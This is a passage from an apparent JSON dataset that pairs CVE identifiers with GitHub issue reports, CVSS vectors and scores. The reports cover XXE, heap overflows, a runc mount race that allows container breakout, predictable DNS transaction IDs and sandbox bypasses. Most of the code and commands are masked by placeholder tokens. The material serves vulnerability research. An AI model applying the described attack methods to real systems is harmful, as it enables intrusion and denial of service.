        "description": "XML External Entity (XXE) Injection during import of aggregated report. APITAG APITAG XXE Injection is a type of attack against an application that parses XML input. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document. Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier. APITAG Steps to reproduce APITAG NUMBERTAG Using the XML file in the Gist URLTAG , run the following to create a zip attachment APITAG Copy and paste the base NUMBERTAG encoding into one of the test reports, for example FILETAG NUMBERTAG Import the aggregated report APITAG This will trigger the XXE injection and populate the database, given that the data fits into the database fields. APITAG Remediation APITAG Use a XML parser with entity expansion disabled. Please refer to this guideline URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19703",
        "Issue_Url_old": "https://github.com/ktorio/ktor/issues/1467",
        "Issue_Url_new": "https://github.com/ktorio/ktor/issues/1467",
        "Repo_new": "ktorio/ktor",
        "Issue_Created_At": "2019-11-29T11:37:32Z",
        "description": "Ktor client resends auth data to redirect location. Ktor Version and Engine Used Ktor HTTP client NUMBERTAG with Apache engine. Describe the bug Enable APITAG for http client and send request with auth data to the host APITAG which redirects to the host APITAG with auth data from host foo . To Reproduce Steps to reproduce the behavior: CODETAG Actual result: Authorization header data is leaked to the host APITAG . Expected behavior The Authorization header from original request to the host foo is cleared before establishing redirect request to the host bar . It's a good security practice. Comment It could be solved by cleaning the Authorization header in the APITAG feature: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19720",
        "Issue_Url_old": "https://github.com/marcIhm/yabasic/issues/36",
        "Issue_Url_new": "https://github.com/marcihm/yabasic/issues/36",
        "Repo_new": "marcihm/yabasic",
        "Issue_Created_At": "2019-12-10T13:08:41Z",
        "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing yabasic NUMBERTAG with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in flex.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19725",
        "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/242",
        "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/242",
        "Repo_new": "sysstat/sysstat",
        "Issue_Created_At": "2019-12-09T09:54:32Z",
        "description": "Double free in APITAG When I run a sadf utility with FILETAG , it leads double free bug in APITAG ERRORTAG If skip_extra_struct fails at this line URLTAG , read_stats_from_file falls into format_error: label and try to free buffer here]( URLTAG However buffer has been already freed [before URLTAG , causes double free bug . Thanks",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19729",
        "Issue_Url_old": "https://github.com/williamkapke/bson-objectid/issues/30",
        "Issue_Url_new": "https://github.com/cabinjs/bson-objectid/issues/30",
        "Repo_new": "cabinjs/bson-objectid",
        "Issue_Created_At": "2019-12-07T21:03:35Z",
        "description": "A vulnerability in APITAG We found that APITAG allows an attacker to generate a malformed objectid by inserting an additional property to his user input. Since objectid might be inserted into APITAG this might cause security issues like SQL injection. The vulnerable code is as follows: bson objectid will return early if it detects _bsontype == APITAG in user input object. As a result, objects in arbitrary forms can bypass formatting if they have a valid bsontype. URLTAG In fact, the official implementation (shown in the following code) enforces a stricter early return condition, i.e., only if the constructor of the user input object is APITAG URLTAG Reproduce script CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19766",
        "Issue_Url_old": "https://github.com/bitwarden/jslib/issues/52",
        "Issue_Url_new": "https://github.com/bitwarden/jslib/issues/52",
        "Repo_new": "bitwarden/jslib",
        "Issue_Created_At": "2019-10-31T14:31:41Z",
        "description": "SHA NUMBERTAG is a terrible choice for a PBKDF in NUMBERTAG FILETAG It looks like the only supported choice for a PBKDF is SHA NUMBERTAG This is possibly the worst choice available for a password based KDF, as a PBKDF should be relatively slow, and SHA NUMBERTAG is perhaps practically the fastest hash function on earth due to optimizations made for Bitcoin (e.g. cheap ASICs and suchlike). Even iterated, it's way too fast, and only getting faster. I was evaluating Bitwarden as a potential replacement for Dashlane APITAG sucks) but this is a real non starter for me. Please up your KDF game. It's NUMBERTAG Additional reading: URLTAG URLTAG TL;DR: Use Argon2. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19766",
        "Issue_Url_old": "https://github.com/bitwarden/server/issues/589",
        "Issue_Url_new": "https://github.com/bitwarden/server/issues/589",
        "Repo_new": "bitwarden/server",
        "Issue_Created_At": "2019-11-01T13:55:38Z",
        "description": "Security Issue: KDF max iterations is too low. URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19777",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/109",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/109",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-12T14:03:22Z",
        "description": "heap buffer overflow in stbi__load_main at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in stbi__load_main at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19778",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/110",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/110",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-12T15:11:41Z",
        "description": "heap buffer overflow in load_sixel at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in load_sixel at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19794",
        "Issue_Url_old": "https://github.com/miekg/dns/issues/1043",
        "Issue_Url_new": "https://github.com/miekg/dns/issues/1043",
        "Repo_new": "miekg/dns",
        "Issue_Created_At": "2019-12-05T19:08:46Z",
        "description": "[security] Predictable TXID can lead to response forgeries. The default Id function uses math/rand, meaning the outputs are predictable, and an attacker might be able to use this to forge responses without being on path. Seeding math/rand from crypto/rand is pointless, as the math/rand algorithm is invertible: given a sequence of outputs it's possible to reconstruct the Rand state and predict all future outputs. Exploitation might be a little slower because the outputs are just NUMBERTAG bits, but it's likely to be possible. Unless NUMBERTAG or DNSSEC are used, response verification relies only on source port and TXID. They are both short, but the combination usually makes it hard for an off path attacker to win the race against the real answer. Without the TXID, the attacker has a very good chance of success at a Kaminsky Attack. A couple example scenarios: A DNS cache \u2014 the attacker makes a sequence of requests to get enough TXIDs to reverse the internal state of the RNG, then it causes a request to be issued by the cache to an upstream server, and knowing the TXID sends a spoofed answer to every port, poisoning the cache. A prober with an API, like say Let's Encrypt \u2014 the attacker causes a number of requests to its own domain to observe TXIDs, then causes a lookup for a target domain, and spoofs the response. Since the performance cost seems negligible NUMBERTAG I recommend doing the secure thing by default and just reading the NUMBERTAG bytes from crypto/rand. If there are performance problems, just using a APITAG should solve them, as most of the cost of crypto/rand is syscall overhead. Filing publicly as asked by APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-19794",
        "Issue_Url_old": "https://github.com/coredns/coredns/issues/3519",
        "Issue_Url_new": "https://github.com/coredns/coredns/issues/3519",
        "Repo_new": "coredns/coredns",
        "Issue_Created_At": "2019-12-08T16:31:44Z",
        "description": "APITAG NUMBERTAG Release Tracking. This issue is to keep track of NUMBERTAG release. Specifically we want to update the URLTAG that carries URLTAG /cc MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-19794",
        "Issue_Url_old": "https://github.com/coredns/coredns/issues/3547",
        "Issue_Url_new": "https://github.com/coredns/coredns/issues/3547",
        "Repo_new": "coredns/coredns",
        "Issue_Created_At": "2019-12-16T21:18:11Z",
        "description": "APITAG CVETAG . This is a public announcement of a security vulnerability discovered in earlier versions of APITAG before NUMBERTAG URLTAG As was mentioned in CVETAG , one of the upstream library miekg/dns used Golang's APITAG . This causes predictable TXID and may allow cache poisoning APITAG URLTAG for details). APITAG was impacted by this upstream vulnerability. The latest release of APITAG NUMBERTAG fixes this issue. We encourage all APITAG users to update to NUMBERTAG as soon as possible. The issue was discovered by MENTIONTAG we very much appreciate his contributions! \ud83d\udc4d This issue will keep open for a couple of weeks or so, so that it is visible to public.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-19794",
        "Issue_Url_old": "https://github.com/miekg/dns/issues/1037",
        "Issue_Url_new": "https://github.com/miekg/dns/issues/1037",
        "Repo_new": "miekg/dns",
        "Issue_Created_At": "2019-11-15T00:55:26Z",
        "description": "Revisit randomness decision based on new performance data. In NUMBERTAG and NUMBERTAG some benchmarking data was provided showing that APITAG is faster than APITAG . However, those tests took too narrow a view. It's important to look at id generation in the actual context in which it's used. FILETAG that stands up a trivial DNS server, and sends a lot of queries at it. You can fiddle with values of parallel to try and max out local CPU. On my laptop, APITAG came close to maxing out my CPUs, and I was able to get an average qps of NUMBERTAG for crypto/rand vs NUMBERTAG for math/rand. This is a pretty tiny difference, and that's in optimal conditions. Across a real network, the qps would be much lower, which means the impact of using crypto/rand would be much lower. I'd like to propose making APITAG the default, so users don't have to worry about whether they need more secure ID generation. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-19795",
        "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/29",
        "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/29",
        "Repo_new": "michaelforney/samurai",
        "Issue_Created_At": "2019-12-13T18:05:45Z",
        "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing samurai NUMBERTAG with American Fuzzy Lop, I found a heap based buffer overflow in the APITAG function, in util.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19796",
        "Issue_Url_old": "https://github.com/marcIhm/yabasic/issues/37",
        "Issue_Url_new": "https://github.com/marcihm/yabasic/issues/37",
        "Repo_new": "marcihm/yabasic",
        "Issue_Created_At": "2019-12-13T19:41:08Z",
        "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing yabasic NUMBERTAG with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in function.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19847",
        "Issue_Url_old": "https://github.com/fontforge/libspiro/issues/21",
        "Issue_Url_new": "https://github.com/fontforge/libspiro/issues/21",
        "Repo_new": "fontforge/libspiro",
        "Issue_Created_At": "2019-12-17T10:19:54Z",
        "description": "Stack based buffer overflow in the APITAG function. Hi, When building libspiro NUMBERTAG with APITAG enabled and running the test suite, I found a stack based buffer overflow in APITAG in spiro.c. In the test suite, APITAG to APITAG all trigger the same issue. The issue can be triggered as follow: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-19887",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/14",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/14",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2019-12-17T15:58:08Z",
        "description": "APITAG in jfif_encode at APITAG run APITAG in linux result in gdb. APITAG steam is a pointer which is null in this case. Dereferencing null pointer cause segment fault. fix: CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19888",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/13",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/13",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2019-12-17T06:48:47Z",
        "description": "Deny of Service caused by dividing zero without sanity check in jfif.c. file: jfif.c function: jfif_decode line NUMBERTAG mcuw = sfh_ma NUMBERTAG mcuh = sfv_ma NUMBERTAG jw = ALIGN(jfif >width , mcuw); jh = ALIGN(jfif >height, mcuh); mcuc = jw / mcuw; < mcuw can be zero mcur = jh / mcuh; // calculate mcu info",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19899",
        "Issue_Url_old": "https://github.com/PebbleTemplates/pebble/issues/493",
        "Issue_Url_new": "https://github.com/pebbletemplates/pebble/issues/493",
        "Repo_new": "pebbletemplates/pebble",
        "Issue_Created_At": "2019-12-18T21:59:56Z",
        "description": "Unsafe Methods Bypass. I was reading about URLTAG and found a bypass to the fix in NUMBERTAG URLTAG . The following code will throw a security exception after the fix in NUMBERTAG APITAG However you can still access APITAG via the APITAG signature: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19906",
        "Issue_Url_old": "https://github.com/cyrusimap/cyrus-sasl/issues/587",
        "Issue_Url_new": "https://github.com/cyrusimap/cyrus-sasl/issues/587",
        "Repo_new": "cyrusimap/cyrus-sasl",
        "Issue_Created_At": "2019-11-28T15:38:04Z",
        "description": "Off by one in _sasl_add_string function. Dear Cyrus SASL team \u2014 During tests against openldap NUMBERTAG I have detected an off by one error in _sasl_add_string function. In case of openldap this bug can cause a denial of service condition or has other unspecified impact. Valgrind output from openldap ERRORTAG Patch CODETAG Please let me know what additional information I can provide to fix the issue. Stephan Zeisberg",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19909",
        "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/5302",
        "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/5302",
        "Repo_new": "pkp/pkp-lib",
        "Issue_Created_At": "2019-11-26T20:40:21Z",
        "description": "Use json_encode/json_decode instead of serialize/unserialize in report generator. JSON is limited to simple constructs like arrays, strings, and numbers. serialize / ERRORTAG can be used to describe more complex objects, which may not be trustworthy. Use APITAG / APITAG instead of serialize / ERRORTAG in the report generator. Review elsewhere for similar usage.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19921",
        "Issue_Url_old": "https://github.com/opencontainers/runc/issues/2197",
        "Issue_Url_new": "https://github.com/opencontainers/runc/issues/2197",
        "Repo_new": "opencontainers/runc",
        "Issue_Created_At": "2020-01-01T13:07:23Z",
        "description": "[ CVETAG ]: Volume mount race condition with shared mounts. Disclosed in URLTAG Here's the original report to APITAG Hi all, an attacker who controls the container image for two containers that share a volume can race volume mounts during container initialization, by adding a symlink to the rootfs that points to a directory on the volume. The second container won't be able to see the actual mount, but it can race it by modifying the mount point on the volume. This can be exploited for a full container breakout by racing readonly/mask mounts, allowing writes to dangerous paths like APITAG . Example: The rootfs of container A has a symlink APITAG > APITAG Container A specifies a named volume mounted to APITAG Container B, started before container A, shares this named volume and repeatedly swaps APITAG and APITAG Container A mounts procfs to APITAG , but when it remounts APITAG , it does so at APITAG . This can reliably be reproduced using runc and podman on Fedora NUMBERTAG takes about NUMBERTAG s to win the race for me): URLTAG APITAG would ordinarily prevent the exploit by disallowing APITAG from writing APITAG , but it can be disabled by symlinking APITAG to something benign like APITAG (bypassing the procfs check). APITAG can be disabled similarly. Docker specifies the mounts in a different order and mounts procfs after it mounts the volumes, mounting over the /proc symlink, which appears to prevent at least the /proc approach. I haven't tested other runc usage scenarios, for instance, k8s+cri o might be vulnerable as well. Fabian of Cure NUMBERTAG in CC) created a minimal APITAG that uses runc directly: URLTAG There are other container init steps after the volume mount that can be raced, obvious ones being APITAG and the APITAG attrs but there might be others, especially in APITAG (like tricking remount into mounting the rootfs as rshared if there's another volume that specifies the flag, but I haven't tried that). This is similar to the vulnerability I reported that Adam Iwaniuk disclosed during their Dragon Sector CTF ( URLTAG and a similar crun one ( URLTAG The fix for the mounts is probably what Aleksa outlined here, using PATHTAG to resolve the path: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2019-19922",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/67577",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/67577",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2018-08-20T04:06:20Z",
        "description": "CFS quotas can lead to unnecessary throttling. > /kind bug This is not a bug in Kubernets per se, it's more of a heads up. I've read this great blog post: URLTAG From the blog post I learned that k8s is using cfs quotas to enforce CPU limits. Unfortunately, those can lead to unnecessary throttling, especially for well behaved tenants. See this unresolved bug in Linux kernel I filed a while back: CVETAG There's an open and stalled patch that addresses the issue (I've not verified if it works): URLTAG cc MENTIONTAG APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19930",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/193",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/193",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-12-20T13:37:27Z",
        "description": "Deny of Service, caused by integer overflow in function APITAG PATHTAG Function APITAG didn't check argument APITAG if it's negative. If it is a negative number, then argument which malloc will use later is a huge number. For example NUMBERTAG would be interpreted as NUMBERTAG ffffffff on NUMBERTAG bit arch or NUMBERTAG ffffffffffffffff on NUMBERTAG bit arch. APITAG poc: FILETAG steps to reproduce NUMBERTAG compile libiec NUMBERTAG with compiler flag APITAG NUMBERTAG compile test.c in FILETAG NUMBERTAG run: APITAG in gdb result in gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19931",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/194",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/194",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-12-20T13:55:52Z",
        "description": "Heap overflow in function APITAG PATHTAG Function APITAG has heap overflow vulnerability in file PATHTAG APITAG poc: FILETAG steps to reproduce NUMBERTAG compile libiec NUMBERTAG with compiler flag APITAG NUMBERTAG compile test.c in FILETAG NUMBERTAG run: APITAG in gdb result in gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19944",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/196",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/196",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-12-23T07:20:53Z",
        "description": "Deny of service caused in function APITAG in PATHTAG APITAG in PATHTAG doesn't check passed arguments. APITAG and APITAG can be large number, so following memory access APITAG would segment fault. APITAG poc: FILETAG gdb stack backtrace: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19948",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1562",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1562",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-29T03:08:25Z",
        "description": "heap buffer overflow in APITAG of coders/sgi.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/sgi.c. Steps to Reproduce APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19949",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1561",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1561",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-29T02:55:44Z",
        "description": "heap buffer overflow in APITAG of png.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of png.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19952",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1791",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1791",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-11-27T06:48:11Z",
